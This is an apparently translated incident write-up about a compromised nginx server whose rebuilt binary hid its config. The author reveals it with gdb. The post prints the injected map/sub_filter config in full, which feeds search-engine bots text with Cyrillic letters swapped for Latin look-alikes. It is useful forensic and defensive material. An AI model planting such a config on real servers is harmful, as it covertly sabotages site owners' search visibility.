When 'a' is not equal to 'a'. In the wake of a hack

A rather unpleasant story happened to one of my friends. But as unpleasant as it turned out for Mikhail, it was just as entertaining for me.

I should say that my friend is a decent UNIX user: he can install mysql and php on his own and do simple nginx setups.
And he has a dozen or a dozen and a half sites dedicated to construction tools.

One of these sites, dedicated to chainsaws, sits firmly in the TOP of the search engines. The site is a non-commercial review, but someone has made a habit of attacking it: now DDoS, now bruteforce, now nasty reviews and complaints to the hoster and to RKN.
Suddenly everything went quiet, and that quiet turned out badly: the site began to slide down from the top lines of the search results.


That was the preamble; now the admin story itself.

It is close to bedtime when the phone rings: "San, could you take a look at my server? It seems to me I've been hacked. I can't prove it, but the feeling hasn't left me for three weeks now. Maybe it's just time for me to get treated for paranoia?"

What followed was a half-hour conversation that can be summarized like this:

  • the ground for a hack was quite fertile;
  • an attacker could have obtained rights higher than those of an ordinary user;
  • the attack (if it happened) was aimed specifically at this site;
  • the problem areas have been fixed, and it only remains to understand whether there was an incident at all;
  • the hack could not have affected the site code and the databases.

Regarding the last point.


Only the white (public) IP of the frontend looks out to the world. There is no interaction between the backends and the frontend other than http(s); the users/passwords are different and no keys were exchanged. On the grey (private) addresses all ports are closed except 80/443. The white IPs of the backends are known only to two users, whom Mikhail trusts completely.

Debian 9 is installed on the frontend, and by the time of the call the system had been cut off from the world by an external firewall and stopped.

"OK, give me access," I decide to postpone sleep for an hour. "I'll see for myself."

Here and below:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Searching for a possible hack

I start the server, first in rescue mode. I mount the disks and leaf through the auth logs, the shell history, the system logs and so on; where possible I check file creation dates, although I understand that a normal cracker would have "cleaned up" after himself, and that Misha had already "trampled" plenty while searching on his own.

I start in normal mode, still not really understanding what to look for, and study the configs. First of all I am interested in nginx, since in general there is nothing else on the frontend.
The configs are small and neatly arranged in a dozen files; I just look through them with cat one by one. At first glance everything is clean, but you never know whether I have missed some include, so let me get a full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I don't understand: "Where is the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question is added to the list: "Why such an ancient version of nginx?"

Moreover, the system believes that the latest version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- You woke me up; I don't even know how to do that!
- OK, go back to sleep...

Nginx was clearly rebuilt, and the listing produced by "-T" is hidden for a reason. There is no more doubt about the hack; one could simply accept it and (since Misha had already replaced the server with a new one) consider the problem solved.
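The disagreement between what the binary says about itself and what dpkg records is the kind of check worth automating. The Python below is an added example, not from the article: it parses the two outputs quoted above and, on a live Debian host, also runs dpkg -V against the package that actually owns /usr/sbin/nginx (the nginx row above is an arch "all" metapackage; the binary ships in nginx-full, nginx-light or nginx-core). The function names are my own.

```python
import re
import shutil
import subprocess

# The two strings quoted in the article, used here as test input.
BANNER = "nginx version: nginx/1.10.3"
DPKG_ROW = "ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server"


def banner_version(banner: str) -> str:
    """Version the binary reports about itself (`nginx -v` prints it to stderr)."""
    m = re.search(r"nginx/(\d+(?:\.\d+)+)", banner)
    return m.group(1) if m else ""


def dpkg_version(row: str) -> str:
    """Upstream part of the package version in a `dpkg -l` row: '1.14.2-2+deb10u1' -> '1.14.2'."""
    m = re.match(r"\s*\S+\s+\S+\s+(\d+(?:\.\d+)+)", row)
    return m.group(1) if m else ""


def binary_matches_package(banner: str, row: str) -> bool:
    """False when the binary and the package database disagree, as on Misha's frontend."""
    v = banner_version(banner)
    return v != "" and v == dpkg_version(row)


def owning_package(path: str) -> str:
    """`dpkg -S` names the package that shipped a file ('nginx-full: /usr/sbin/nginx')."""
    out = subprocess.run(["dpkg", "-S", path], capture_output=True, text=True).stdout
    return out.split(":", 1)[0].strip() if ":" in out else ""


def check_live_system(binary: str = "/usr/sbin/nginx") -> bool:
    """Run the checks on the host: version agreement plus `dpkg -V` on the owning package."""
    if shutil.which("dpkg") is None:
        raise RuntimeError("not a dpkg-based system")
    pkg = owning_package(binary)
    if not pkg:                      # a binary no package claims is itself a finding
        return False
    banner = subprocess.run([binary, "-v"], capture_output=True, text=True).stderr
    row = subprocess.run(["dpkg", "-l", pkg], capture_output=True, text=True).stdout.splitlines()[-1]
    # dpkg -V prints one line per file whose md5 differs from the shipped manifest; empty means clean.
    # Caveat: an attacker with root can also rewrite the md5sums manifest, so a clean result is weak evidence.
    verify = subprocess.run(["dpkg", "-V", pkg], capture_output=True, text=True).stdout
    return binary_matches_package(banner, row) and verify.strip() == ""
```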

And really, since someone had obtained root rights, the only sensible thing to do is reinstall the system, and there was no point in digging into what exactly had happened there, but this time curiosity got the better of sleep. How can we find out what they wanted to hide from us?

Let's try tracing:

$ strace nginx -T

Looking at it, it is clear that the trace lacks lines like

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

Just for fun, let's compare what we found.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I think a section of the code in /src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was brought to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

which is why "-T" does not print the listing.

But how can we see our config?

If my guess is right and the problem is only in the ngx_dump_config variable, let's try setting it with gdb. Luckily, the --with-cc-opt option contains -g, and hopefully the -O2 optimization will not get in our way. At the same time, since I don't know how ngx_dump_config might be handled inside the case 'T': block, we will not invoke that block at all, but set the variable while using case 't':

Why '-t' can be used as well as '-T': the handling of the if (ngx_dump_config) block happens inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Of course, if the code was changed in this section rather than inside case 'T':, my method will not work.

Test nginx.conf

Since the problem has already been solved, it was established that for the malware to work a minimal nginx config of this form is enough:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We will use it for brevity in the article.

Launching the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Step by step:

  • set a breakpoint on the main() function
  • start the program
  • change the value of the variable that controls config output: ngx_dump_config=1
  • continue/finish the program

As we can see, the real config differs from ours; we pick out the parasitic piece from it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's look at what is going on here, in order.

Detect the user-agent of the yandex/google bots:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

Exclude the wordpress service pages:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for those that fall under both conditions above

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

replace, in the HTML text of the page, the Cyrillic 'о' with the Latin 'o' and the Cyrillic 'а' with the Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

That's right, the whole trick is that the Cyrillic 'а' != the Latin 'a', just as 'о' != 'o'.


Thus the search engine bots, instead of normal 100% Cyrillic text, received spoiled junk diluted with Latin 'a' and 'o'. I won't presume to discuss how this affects SEO, but it is unlikely that such a jumble of letters would have a positive effect on positions in the search results.
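As an added example (not from the article), the Python below mirrors the logic of the four map blocks and the sub_filter pair walked through above, so you can see what a bot received for a given request, and pairs it with the defender's check: scanning served HTML for words that mix Cyrillic and Latin letters, which also catches homoglyph substitutions other than о/а. The sample HTML, the user-agent strings and the function names are constructed for the demo.

```python
import re
import unicodedata

# Constructed sample response body (not from the article): a Russian sentence in HTML.
SAMPLE_HTML = "<p>Бензопила для дачи и дома</p>"

# Mirror of the first two `map` blocks of the hidden config; nginx's "~*" prefix
# means a case-insensitive regular expression match.
BOT_UA = re.compile(r"yandex\.com/bots|www\.google\.com/bot\.html", re.IGNORECASE)
WP_URI = re.compile(r"/wp-", re.IGNORECASE)


def apply_parasite(html: str, user_agent: str, uri: str) -> str:
    """What the injected config does to a response body for one request."""
    sign_user_agent = 1 if BOT_UA.search(user_agent) else 0   # map $http_user_agent $sign_user_agent
    sign_uri = 1 if WP_URI.search(uri) else 0                 # map $uri $sign_uri
    # "о:1:0 o; default о;" and "а:1:0 a; default а;": the Latin letter is chosen
    # only when the client is a bot AND the URI is not a WordPress service page.
    if sign_user_agent == 1 and sign_uri == 0:
        # sub_filter 'о' $sign_o; sub_filter 'а' $sign_a; with sub_filter_once off
        return html.replace("\u043e", "o").replace("\u0430", "a")
    return html


def find_mixed_script_words(text: str) -> list[str]:
    """Defender-side check: words that mix Cyrillic and Latin letters.

    Ordinary Russian text rarely mixes scripts inside a single word, so every
    hit deserves a manual look; a bot-UA fetch compared with a browser-UA fetch
    of the same page makes the tampering obvious.
    """
    hits = []
    for word in re.findall(r"\w+", text):
        scripts = {unicodedata.name(ch, "").split(" ")[0] for ch in word if ch.isalpha()}
        if {"CYRILLIC", "LATIN"} <= scripts:
            hits.append(word)
    return hits


if __name__ == "__main__":
    bot = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    served = apply_parasite(SAMPLE_HTML, bot, "/catalog/chainsaws")
    print(served)
    print("tampered words:", find_mixed_script_words(served))
```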

What can I say: guys with imagination.

Links

Debugging with GDB
gdb(1) — Linux man page
strace(1) — Linux man page
Nginx — Module ngx_http_sub_module
About saws, chainsaws and electric saws

Source: www.habr.com
